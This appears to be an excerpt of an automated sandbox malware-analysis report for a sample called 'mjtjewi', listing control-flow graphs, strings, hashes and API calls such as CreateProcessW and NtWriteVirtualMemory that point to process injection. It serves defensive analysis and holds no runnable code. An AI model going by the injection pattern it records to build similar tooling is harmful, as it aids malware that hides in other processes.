                                                          control_flow_graph 0 15246c0-15246e5 1 15246e7 0->1 2 15246ec-1524709 0->2 1->2 3 1524711 2->3 4 1524718-1524734 3->4 5 1524736 4->5 6 152473d-152473e 4->6 5->3 7 1524813-1524825 5->7 8 1524ad3-1524aea 5->8 9 1524916-1524936 5->9 10 15248d4-15248e1 5->10 11 15247dc-15247e8 5->11 12 1524a5d-1524a69 5->12 13 1524743-152474f 5->13 14 15249c1-15249c5 5->14 15 1524846-152484c 5->15 16 1524a87-1524a90 5->16 17 1524885-1524891 5->17 18 1524a0b-1524a1d 5->18 19 15249f1-1524a06 5->19 20 1524774-1524780 5->20 21 152493b-152493f 5->21 22 1524abc-1524ace 5->22 23 1524a22-1524a3b call 1524d08 5->23 24 15248e6-15248ea 5->24 25 152482a-1524841 5->25 26 152486b-1524880 5->26 27 152496b-1524983 5->27 28 15247a8-15247b4 5->28 29 1524aef-1524b02 5->29 30 15248af-15248cf 5->30 6->13 6->29 7->4 8->4 9->4 10->4 51 15247ea 11->51 52 15247ef-152480e 11->52 37 1524a70-1524a82 12->37 38 1524a6b 12->38 35 1524751 13->35 36 1524756-1524772 13->36 31 15249c7-15249d6 14->31 32 15249d8-15249df 14->32 61 1524854-1524866 15->61 43 1524a92-1524aa1 16->43 44 1524aa3-1524aaa 16->44 33 1524893 17->33 34 1524898-15248aa 17->34 18->4 19->4 39 1524782 20->39 40 1524787-15247a3 20->40 47 1524952-1524959 21->47 48 1524941-1524950 21->48 22->4 59 1524a41-1524a58 23->59 41 15248ec-15248fb 24->41 42 15248fd-1524904 24->42 25->4 26->4 49 1524985 27->49 50 152498a-15249a0 27->50 45 15247b6 28->45 46 15247bb-15247d7 28->46 30->4 55 15249e6-15249ec 31->55 32->55 33->34 34->4 35->36 36->4 37->4 38->37 39->40 40->4 53 152490b-1524911 41->53 42->53 57 1524ab1-1524ab7 43->57 44->57 45->46 46->4 54 1524960-1524966 47->54 48->54 49->50 69 15249a2 50->69 70 15249a7-15249bc 50->70 51->52 52->4 53->4 54->4 55->4 57->4 59->4 61->4 69->70 70->4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: >,9$$>,9$$D|zJ$D|zJ$i4t:
                                                          • API String ID: 0-3823586563
                                                          • Opcode ID: 5c9436d1091b551b6e963cc83afc3b96006af0935b3cab63a408bfe01e76712e
                                                          • Instruction ID: 2e9e77e56b1aef67bdef980437e78f1433830be3718badedae811b213cc1c748
                                                          • Opcode Fuzzy Hash: 5c9436d1091b551b6e963cc83afc3b96006af0935b3cab63a408bfe01e76712e
                                                          • Instruction Fuzzy Hash: 7BD13975E0521ADFCB04CFA9C4808AEFBF2FF8A300B55D559D516AB258D734AA42CF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 277 2df92b9-2df9305 278 2df930c-2df9352 call 2df9920 277->278 279 2df9307 277->279 282 2df9355 278->282 279->278 283 2df935c-2df9378 282->283 284 2df937a 283->284 285 2df9381-2df9382 283->285 284->282 284->285 286 2df93dc-2df93e8 284->286 287 2df969c-2df96bc 284->287 288 2df94db-2df94fb 284->288 289 2df96da-2df96fa 284->289 290 2df9459-2df946b 284->290 291 2df95d4-2df95e6 284->291 292 2df9607-2df9613 284->292 293 2df9387-2df939e 284->293 294 2df9586-2df959b 284->294 295 2df9406-2df9424 284->295 296 2df9685-2df9697 284->296 297 2df96c1-2df96d5 284->297 298 2df9500-2df9509 284->298 299 2df96ff-2df970b 284->299 300 2df963b-2df963f 284->300 301 2df9535-2df9541 284->301 302 2df9470-2df947c 284->302 303 2df93af-2df93b3 284->303 304 2df972c-2df9733 284->304 305 2df95eb-2df9602 284->305 306 2df966b-2df9680 284->306 307 2df9429-2df942d 284->307 308 2df94a7-2df94b3 284->308 309 2df95a0-2df95ac 284->309 310 2df93a0-2df93ad 284->310 285->304 331 2df93ef 286->331 332 2df93ea 286->332 287->283 288->283 289->283 290->283 291->283 325 2df961a-2df9636 292->325 326 2df9615 292->326 293->283 294->283 295->283 296->283 297->283 319 2df951c-2df9523 298->319 320 2df950b-2df951a 298->320 311 2df970d 299->311 312 2df9712-2df9727 299->312 327 2df9652-2df9659 300->327 328 2df9641-2df9650 300->328 321 2df9548-2df955e 301->321 322 2df9543 301->322 315 2df947e 302->315 316 2df9483-2df94a2 302->316 329 2df93c6-2df93cd 303->329 330 2df93b5-2df93c4 303->330 305->283 306->283 313 2df942f-2df943e 307->313 314 2df9440-2df9447 307->314 317 2df94ba-2df94d6 308->317 318 2df94b5 308->318 323 2df95ae 309->323 324 2df95b3-2df95cf 309->324 310->283 311->312 312->283 333 2df944e-2df9454 313->333 314->333 315->316 316->283 317->283 318->317 335 2df952a-2df9530 319->335 320->335 348 2df9565-2df9581 321->348 349 2df9560 321->349 322->321 323->324 324->283 325->283 326->325 336 2df9660-2df9666 327->336 328->336 337 2df93d4-2df93da 329->337 330->337 347 2df93f9-2df9401 331->347 332->331 333->283 335->283 336->283 337->283 347->283 348->283 349->348
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: i,($qM$G$[v[
                                                          • API String ID: 0-2528883634
                                                          • Opcode ID: 3ef1793d4d71e2b5245b204c3eb72ffe824ae4ebc9eb06406bf248d21a7c52b1
                                                          • Instruction ID: fb998aac318ebe55be9694208b9a5c7f6f6d2a430c99b963d4b99c5316f930ef
                                                          • Opcode Fuzzy Hash: 3ef1793d4d71e2b5245b204c3eb72ffe824ae4ebc9eb06406bf248d21a7c52b1
                                                          • Instruction Fuzzy Hash: FBD15870E0520ADFCB84CF99C4909AEFBB2FF88314B15955AC555AB364D334EA42CF98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 352 2df92e0-2df9305 353 2df930c-2df9352 call 2df9920 352->353 354 2df9307 352->354 357 2df9355 353->357 354->353 358 2df935c-2df9378 357->358 359 2df937a 358->359 360 2df9381-2df9382 358->360 359->357 359->360 361 2df93dc-2df93e8 359->361 362 2df969c-2df96bc 359->362 363 2df94db-2df94fb 359->363 364 2df96da-2df96fa 359->364 365 2df9459-2df946b 359->365 366 2df95d4-2df95e6 359->366 367 2df9607-2df9613 359->367 368 2df9387-2df939e 359->368 369 2df9586-2df959b 359->369 370 2df9406-2df9424 359->370 371 2df9685-2df9697 359->371 372 2df96c1-2df96d5 359->372 373 2df9500-2df9509 359->373 374 2df96ff-2df970b 359->374 375 2df963b-2df963f 359->375 376 2df9535-2df9541 359->376 377 2df9470-2df947c 359->377 378 2df93af-2df93b3 359->378 379 2df972c-2df9733 359->379 380 2df95eb-2df9602 359->380 381 2df966b-2df9680 359->381 382 2df9429-2df942d 359->382 383 2df94a7-2df94b3 359->383 384 2df95a0-2df95ac 359->384 385 2df93a0-2df93ad 359->385 360->379 406 2df93ef 361->406 407 2df93ea 361->407 362->358 363->358 364->358 365->358 366->358 400 2df961a-2df9636 367->400 401 2df9615 367->401 368->358 369->358 370->358 371->358 372->358 394 2df951c-2df9523 373->394 395 2df950b-2df951a 373->395 386 2df970d 374->386 387 2df9712-2df9727 374->387 402 2df9652-2df9659 375->402 403 2df9641-2df9650 375->403 396 2df9548-2df955e 376->396 397 2df9543 376->397 390 2df947e 377->390 391 2df9483-2df94a2 377->391 404 2df93c6-2df93cd 378->404 405 2df93b5-2df93c4 378->405 380->358 381->358 388 2df942f-2df943e 382->388 389 2df9440-2df9447 382->389 392 2df94ba-2df94d6 383->392 393 2df94b5 383->393 398 2df95ae 384->398 399 2df95b3-2df95cf 384->399 385->358 386->387 387->358 408 2df944e-2df9454 388->408 389->408 390->391 391->358 392->358 393->392 410 2df952a-2df9530 394->410 395->410 423 2df9565-2df9581 396->423 424 2df9560 396->424 397->396 398->399 399->358 400->358 401->400 411 2df9660-2df9666 402->411 403->411 412 2df93d4-2df93da 404->412 405->412 422 2df93f9-2df9401 406->422 407->406 408->358 410->358 411->358 412->358 422->358 423->358 424->423
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: i,($qM$G$[v[
                                                          • API String ID: 0-2528883634
                                                          • Opcode ID: ddd32b55c7f6f9cff67a1b8ed6920b71241ba318d142e34b14ec8e741dfbace9
                                                          • Instruction ID: 2f6f5dcc36e3e0847f5f8ea70030b9a78ddc0b066c1c7acfc0c1901313b372e5
                                                          • Opcode Fuzzy Hash: ddd32b55c7f6f9cff67a1b8ed6920b71241ba318d142e34b14ec8e741dfbace9
                                                          • Instruction Fuzzy Hash: A7D15771E0520ADFCB84CF9AC4909AEFBB2FF88304B159559C515AB364D734EA42CF98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 427 2df7053-2df7068 428 2df706a-2df70ab 427->428 429 2df70d6-2df710c 427->429 430 2df70ad 428->430 431 2df70b2-2df70d4 428->431 434 2df710f 429->434 430->431 431->429 435 2df7116-2df7132 434->435 436 2df713b-2df713c 435->436 437 2df7134 435->437 442 2df72a6-2df7316 436->442 437->434 437->436 438 2df716e-2df71a4 call 2df7918 437->438 439 2df721d-2df723d 437->439 440 2df728c-2df72a1 437->440 441 2df7259-2df7266 437->441 437->442 443 2df71e2-2df7218 437->443 444 2df7242-2df7254 437->444 445 2df7141-2df7145 437->445 446 2df71c1-2df71dd 437->446 458 2df71aa-2df71bc 438->458 439->435 440->435 457 2df726f-2df7287 441->457 462 2df7318 call 2df8ddf 442->462 463 2df7318 call 2df899b 442->463 464 2df7318 call 2df8a85 442->464 465 2df7318 call 2df8392 442->465 443->435 444->435 447 2df7158-2df715f 445->447 448 2df7147-2df7156 445->448 446->435 452 2df7166-2df716c 447->452 448->452 452->435 457->435 458->435 461 2df731e-2df7328 462->461 463->461 464->461 465->461
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q$Te_q$U
                                                          • API String ID: 0-2293512650
                                                          • Opcode ID: b718953cfba88cc07f9d46f5f5dd3dd039c501507c223bfc31e33749e96d309a
                                                          • Instruction ID: 93a38f83d53603847158d53bbdb87f54f0ddeb4d90aad4beb82d1242872f8737
                                                          • Opcode Fuzzy Hash: b718953cfba88cc07f9d46f5f5dd3dd039c501507c223bfc31e33749e96d309a
                                                          • Instruction Fuzzy Hash: 00912674E052098FDB48CFA9C9809DEFBB2FF89300F24942AD519AB364D7719946CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 544 15245f1-15246e5 545 15246e7 544->545 546 15246ec-1524709 544->546 545->546 547 1524711 546->547 548 1524718-1524734 547->548 549 1524736 548->549 550 152473d-152473e 548->550 549->547 551 1524813-1524825 549->551 552 1524ad3-1524aea 549->552 553 1524916-1524936 549->553 554 15248d4-15248e1 549->554 555 15247dc-15247e8 549->555 556 1524a5d-1524a69 549->556 557 1524743-152474f 549->557 558 15249c1-15249c5 549->558 559 1524846-152484c 549->559 560 1524a87-1524a90 549->560 561 1524885-1524891 549->561 562 1524a0b-1524a1d 549->562 563 15249f1-1524a06 549->563 564 1524774-1524780 549->564 565 152493b-152493f 549->565 566 1524abc-1524ace 549->566 567 1524a22-1524a3b call 1524d08 549->567 568 15248e6-15248ea 549->568 569 152482a-1524841 549->569 570 152486b-1524880 549->570 571 152496b-1524983 549->571 572 15247a8-15247b4 549->572 573 1524aef-1524b02 549->573 574 15248af-15248cf 549->574 550->557 550->573 551->548 552->548 553->548 554->548 595 15247ea 555->595 596 15247ef-152480e 555->596 581 1524a70-1524a82 556->581 582 1524a6b 556->582 579 1524751 557->579 580 1524756-1524772 557->580 575 15249c7-15249d6 558->575 576 15249d8-15249df 558->576 605 1524854-1524866 559->605 587 1524a92-1524aa1 560->587 588 1524aa3-1524aaa 560->588 577 1524893 561->577 578 1524898-15248aa 561->578 562->548 563->548 583 1524782 564->583 584 1524787-15247a3 564->584 591 1524952-1524959 565->591 592 1524941-1524950 565->592 566->548 603 1524a41-1524a58 567->603 585 15248ec-15248fb 568->585 586 15248fd-1524904 568->586 569->548 570->548 593 1524985 571->593 594 152498a-15249a0 571->594 589 15247b6 572->589 590 15247bb-15247d7 572->590 574->548 599 15249e6-15249ec 575->599 576->599 577->578 578->548 579->580 580->548 581->548 582->581 583->584 584->548 597 152490b-1524911 585->597 586->597 601 1524ab1-1524ab7 587->601 588->601 589->590 590->548 598 1524960-1524966 591->598 592->598 593->594 613 15249a2 594->613 614 15249a7-15249bc 594->614 595->596 596->548 597->548 598->548 599->548 601->548 603->548 605->548 613->614 614->548
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D|zJ$i4t:
                                                          • API String ID: 0-2751561044
                                                          • Opcode ID: 1ffa6b2381ab923db3d550f23db7a52a3693f8680330a7ac06826718bc1e92d6
                                                          • Instruction ID: 7754f3bf3961a49a7bb34141635132107be927381ef1462ccf796b9398c07e3d
                                                          • Opcode Fuzzy Hash: 1ffa6b2381ab923db3d550f23db7a52a3693f8680330a7ac06826718bc1e92d6
                                                          • Instruction Fuzzy Hash: 25F16D75E0521ADFCB04CF95C4808AEFBB2FF8A310B1AC569D416AB655D738A943CF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 467 152459f-15245a0 468 15245a1-15245a9 467->468 469 15245ab-15245ad 468->469 470 152460c-15246e5 468->470 469->468 469->470 471 15246e7 470->471 472 15246ec-1524709 470->472 471->472 474 1524711 472->474 475 1524718-1524734 474->475 476 1524736 475->476 477 152473d-152473e 475->477 476->474 478 1524813-1524825 476->478 479 1524ad3-1524aea 476->479 480 1524916-1524936 476->480 481 15248d4-15248e1 476->481 482 15247dc-15247e8 476->482 483 1524a5d-1524a69 476->483 484 1524743-152474f 476->484 485 15249c1-15249c5 476->485 486 1524846-152484c 476->486 487 1524a87-1524a90 476->487 488 1524885-1524891 476->488 489 1524a0b-1524a1d 476->489 490 15249f1-1524a06 476->490 491 1524774-1524780 476->491 492 152493b-152493f 476->492 493 1524abc-1524ace 476->493 494 1524a22-1524a3b call 1524d08 476->494 495 15248e6-15248ea 476->495 496 152482a-1524841 476->496 497 152486b-1524880 476->497 498 152496b-1524983 476->498 499 15247a8-15247b4 476->499 500 1524aef-1524b02 476->500 501 15248af-15248cf 476->501 477->484 477->500 478->475 479->475 480->475 481->475 522 15247ea 482->522 523 15247ef-152480e 482->523 508 1524a70-1524a82 483->508 509 1524a6b 483->509 506 1524751 484->506 507 1524756-1524772 484->507 502 15249c7-15249d6 485->502 503 15249d8-15249df 485->503 532 1524854-1524866 486->532 514 1524a92-1524aa1 487->514 515 1524aa3-1524aaa 487->515 504 1524893 488->504 505 1524898-15248aa 488->505 489->475 490->475 510 1524782 491->510 511 1524787-15247a3 491->511 518 1524952-1524959 492->518 519 1524941-1524950 492->519 493->475 530 1524a41-1524a58 494->530 512 15248ec-15248fb 495->512 513 15248fd-1524904 495->513 496->475 497->475 520 1524985 498->520 521 152498a-15249a0 498->521 516 15247b6 499->516 517 15247bb-15247d7 499->517 501->475 526 15249e6-15249ec 502->526 503->526 504->505 505->475 506->507 507->475 508->475 509->508 510->511 511->475 524 152490b-1524911 512->524 513->524 528 1524ab1-1524ab7 514->528 515->528 516->517 517->475 525 1524960-1524966 518->525 519->525 520->521 540 15249a2 521->540 541 15249a7-15249bc 521->541 522->523 523->475 524->475 525->475 526->475 528->475 530->475 532->475 540->541 541->475
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D|zJ$i4t:
                                                          • API String ID: 0-2751561044
                                                          • Opcode ID: fa6fdd1b99fb0d1b96d00e724575f81911a4c15713b8bc332124a31785eacf04
                                                          • Instruction ID: 666fbd21278d39d81fb7d5e343b323514b6fcae8d1cbc10d250301e0698994e0
                                                          • Opcode Fuzzy Hash: fa6fdd1b99fb0d1b96d00e724575f81911a4c15713b8bc332124a31785eacf04
                                                          • Instruction Fuzzy Hash: 6EF17E75E0521ADFCB04CF95C4808AEFBB2FF8A310B19D569D416AB255D738E942CF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 617 1522462-15224fb 618 1522502-1522578 call 1520158 617->618 619 15224fd 617->619 625 152257b 618->625 619->618 626 1522582-152259e 625->626 627 15225a0 626->627 628 15225a7-15225a8 626->628 627->625 629 15226df-152274f call 1520168 627->629 630 15225ad-15225e6 627->630 631 15226a2-15226b9 627->631 632 1522682-152269d 627->632 633 1522618-152262a 627->633 634 15225e8-15225ec 627->634 635 15226be-15226da 627->635 636 152262f-1522665 call 1522d20 627->636 628->629 628->630 651 1522751 call 1523760 629->651 652 1522751 call 1523ecb 629->652 653 1522751 call 1523ef9 629->653 654 1522751 call 1523abe 629->654 655 1522751 call 152429e 629->655 656 1522751 call 1523e7c 629->656 630->626 631->626 632->626 633->626 637 15225ee-15225fd 634->637 638 15225ff-1522606 634->638 635->626 648 152266b-152267d 636->648 642 152260d-1522613 637->642 638->642 642->626 648->626 650 1522757-1522761 651->650 652->650 653->650 654->650 655->650 656->650
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q$Te_q
                                                          • API String ID: 0-1615656442
                                                          • Opcode ID: dc3f1a220218f863a7a12f18efff0c2d361af502d0d6005f816a953d277a8b05
                                                          • Instruction ID: 838f7089854e6c1fdd61f7e4ac01ded2a366c9c040c0ba7ec3802b2f1dd1f87c
                                                          • Opcode Fuzzy Hash: dc3f1a220218f863a7a12f18efff0c2d361af502d0d6005f816a953d277a8b05
                                                          • Instruction Fuzzy Hash: F3A11175E042499FCB48CFA9C8809EEFBB2FF8A310F14C26AD419AB255D7359946CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 658 2df7088-2df70ab 659 2df70ad 658->659 660 2df70b2-2df710c 658->660 659->660 664 2df710f 660->664 665 2df7116-2df7132 664->665 666 2df713b-2df713c 665->666 667 2df7134 665->667 672 2df72a6-2df7316 666->672 667->664 667->666 668 2df716e-2df71a4 call 2df7918 667->668 669 2df721d-2df723d 667->669 670 2df728c-2df72a1 667->670 671 2df7259-2df7266 667->671 667->672 673 2df71e2-2df7218 667->673 674 2df7242-2df7254 667->674 675 2df7141-2df7145 667->675 676 2df71c1-2df71dd 667->676 688 2df71aa-2df71bc 668->688 669->665 670->665 687 2df726f-2df7287 671->687 693 2df7318 call 2df8ddf 672->693 694 2df7318 call 2df899b 672->694 695 2df7318 call 2df8a85 672->695 696 2df7318 call 2df8392 672->696 673->665 674->665 677 2df7158-2df715f 675->677 678 2df7147-2df7156 675->678 676->665 682 2df7166-2df716c 677->682 678->682 682->665 687->665 688->665 691 2df731e-2df7328 693->691 694->691 695->691 696->691
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q$Te_q
                                                          • API String ID: 0-1615656442
                                                          • Opcode ID: 46e37ceefc414742de9680039119e1a98df7fae96332cc79b0dd11e9ed589411
                                                          • Instruction ID: 5cb687bd03cadebeaca7a4301d3c911373cc97ed012b294012ebcc6c64024341
                                                          • Opcode Fuzzy Hash: 46e37ceefc414742de9680039119e1a98df7fae96332cc79b0dd11e9ed589411
                                                          • Instruction Fuzzy Hash: 4781C374E002099FDB48CFA9C984AEEFBB2FF89300F20942AD519AB358D7759945CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 697 15224d8-15224fb 698 1522502-1522578 call 1520158 697->698 699 15224fd 697->699 705 152257b 698->705 699->698 706 1522582-152259e 705->706 707 15225a0 706->707 708 15225a7-15225a8 706->708 707->705 709 15226df-152274f call 1520168 707->709 710 15225ad-15225e6 707->710 711 15226a2-15226b9 707->711 712 1522682-152269d 707->712 713 1522618-152262a 707->713 714 15225e8-15225ec 707->714 715 15226be-15226da 707->715 716 152262f-1522665 call 1522d20 707->716 708->709 708->710 731 1522751 call 1523760 709->731 732 1522751 call 1523ecb 709->732 733 1522751 call 1523ef9 709->733 734 1522751 call 1523abe 709->734 735 1522751 call 152429e 709->735 736 1522751 call 1523e7c 709->736 710->706 711->706 712->706 713->706 717 15225ee-15225fd 714->717 718 15225ff-1522606 714->718 715->706 728 152266b-152267d 716->728 722 152260d-1522613 717->722 718->722 722->706 728->706 730 1522757-1522761 731->730 732->730 733->730 734->730 735->730 736->730
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q$Te_q
                                                          • API String ID: 0-1615656442
                                                          • Opcode ID: 7bffac627eca025da5a5c208cf8cdfbc609babed18b54139f508ed53203409fa
                                                          • Instruction ID: 465f6dede657a737d00996086e9e80980082585905dfeaebef720c6142cb27b0
                                                          • Opcode Fuzzy Hash: 7bffac627eca025da5a5c208cf8cdfbc609babed18b54139f508ed53203409fa
                                                          • Instruction Fuzzy Hash: ED81C375E002199FDB08CFAAC894AEEFBF2FF89300F24852AD516AB254D7709945CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 738 152b5b8-152b5da 739 152b5e1-152b5ef 738->739 740 152b5dc 738->740 741 152b5f1-152b603 739->741 742 152b605 739->742 740->739 743 152b608 741->743 742->743 744 152b60b 743->744 745 152b612-152b62e 744->745 746 152b630 745->746 747 152b637-152b638 745->747 746->744 746->747 748 152b7b3-152b7c3 746->748 749 152b673-152b68d 746->749 750 152b791 746->750 751 152b751 746->751 752 152b711-152b74c 746->752 753 152b6c6-152b70c 746->753 754 152b804 746->754 755 152b7ef-152b7ff 746->755 756 152b68f-152b693 746->756 757 152b63d 746->757 747->754 772 152b7d6-152b7dd 748->772 773 152b7c5-152b7d4 748->773 749->745 760 152b79c-152b7ae 750->760 766 152b757-152b75e 751->766 752->745 753->745 768 152b80f 754->768 755->745 758 152b6a6-152b6ad 756->758 759 152b695-152b6a4 756->759 769 152b643-152b64a 757->769 764 152b6b4-152b6c1 758->764 759->764 760->745 764->745 774 152b760-152b76f 766->774 775 152b771-152b778 766->775 770 152b64c-152b65b 769->770 771 152b65d-152b664 769->771 776 152b66b-152b671 770->776 771->776 777 152b7e4-152b7ea 772->777 773->777 779 152b77f-152b78c 774->779 775->779 776->745 777->745 779->745
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C<7#$C<7#
                                                          • API String ID: 0-2641965759
                                                          • Opcode ID: c81b983522ec5a51b0f87a69607a39c1c35f5b85c8cb0b9f0e19aabe81bada5d
                                                          • Instruction ID: 2f0735e322c83aa3e09ef4bf2e2e18b524e1a9c25e43258baac078a4ef91b29d
                                                          • Opcode Fuzzy Hash: c81b983522ec5a51b0f87a69607a39c1c35f5b85c8cb0b9f0e19aabe81bada5d
                                                          • Instruction Fuzzy Hash: 3F6146B5D01229CFCF28CFA5C5446AEBBF1FB8A300F18892AD016AB394D7346A41CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 783 15208e1-1520910 784 1520912 783->784 785 1520917-15209be 783->785 784->785 789 15209c4-15209f6 785->789 791 15209f8-1520a2a 789->791 792 1520a2c-1520a3a 789->792 793 1520a3d-1520ac4 791->793 792->793 798 1520ac6 793->798 799 1520acd-1521701 793->799 798->799
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$.W_
                                                          • API String ID: 0-718456861
                                                          • Opcode ID: e53cf9caa8edba18b62a1eeba53ab9b5f1185656338dd59c1bb2d6676ae3ad99
                                                          • Instruction ID: e81ad805cb0df32971c4ec33c8c5371d5f3b46cf64cf8c605cd472c2997f5458
                                                          • Opcode Fuzzy Hash: e53cf9caa8edba18b62a1eeba53ab9b5f1185656338dd59c1bb2d6676ae3ad99
                                                          • Instruction Fuzzy Hash: 66617575E01618CFDB58CFAAC9446DDBBF2BF89301F14C1AAD409AB264EB345A85CF50
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0AC9D20F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: d235d2856b7f058ef221499d4cd9d7d4c9ab352526425acb0ba8f7a4d0f231f0
                                                          • Instruction ID: d5044859f08afb6a07bf1ffe2d18ce9d04191755a0dc3d65c45ae0200a40e0d4
                                                          • Opcode Fuzzy Hash: d235d2856b7f058ef221499d4cd9d7d4c9ab352526425acb0ba8f7a4d0f231f0
                                                          • Instruction Fuzzy Hash: C102F0B4E00229CFDF25CFA9C884B9DBBB1BF49304F1581AAE419B7250DB349A85CF55
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0AC9D20F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 2ab7a572d0b6407fc478003dc3707a48c5e61454c7ac9ba3b1366825008121ec
                                                          • Instruction ID: 9bc6ee144306d63d6cfcefc312eabd6b86230988848c939eff763e0bbb35fc1f
                                                          • Opcode Fuzzy Hash: 2ab7a572d0b6407fc478003dc3707a48c5e61454c7ac9ba3b1366825008121ec
                                                          • Instruction Fuzzy Hash: DE02DFB4E10229CFDF64CFA9C884B9DBBB1BF49304F1181A9E419B7250DB34AA85CF55
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DEA0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: edcbe561c73fc5e1a5bcc769e278c411ca56e9d4666e449c8a5494f8e7eb40c0
                                                          • Instruction ID: ea94cfffb8181c941ee1f3d03029903d615b4383b5a6ef6691fc433924d4c513
                                                          • Opcode Fuzzy Hash: edcbe561c73fc5e1a5bcc769e278c411ca56e9d4666e449c8a5494f8e7eb40c0
                                                          • Instruction Fuzzy Hash: 25519BB9D012589FCF10CFA9D984ADEFBB1BB59310F14902AE819B7200D735AA45CF64
                                                          APIs
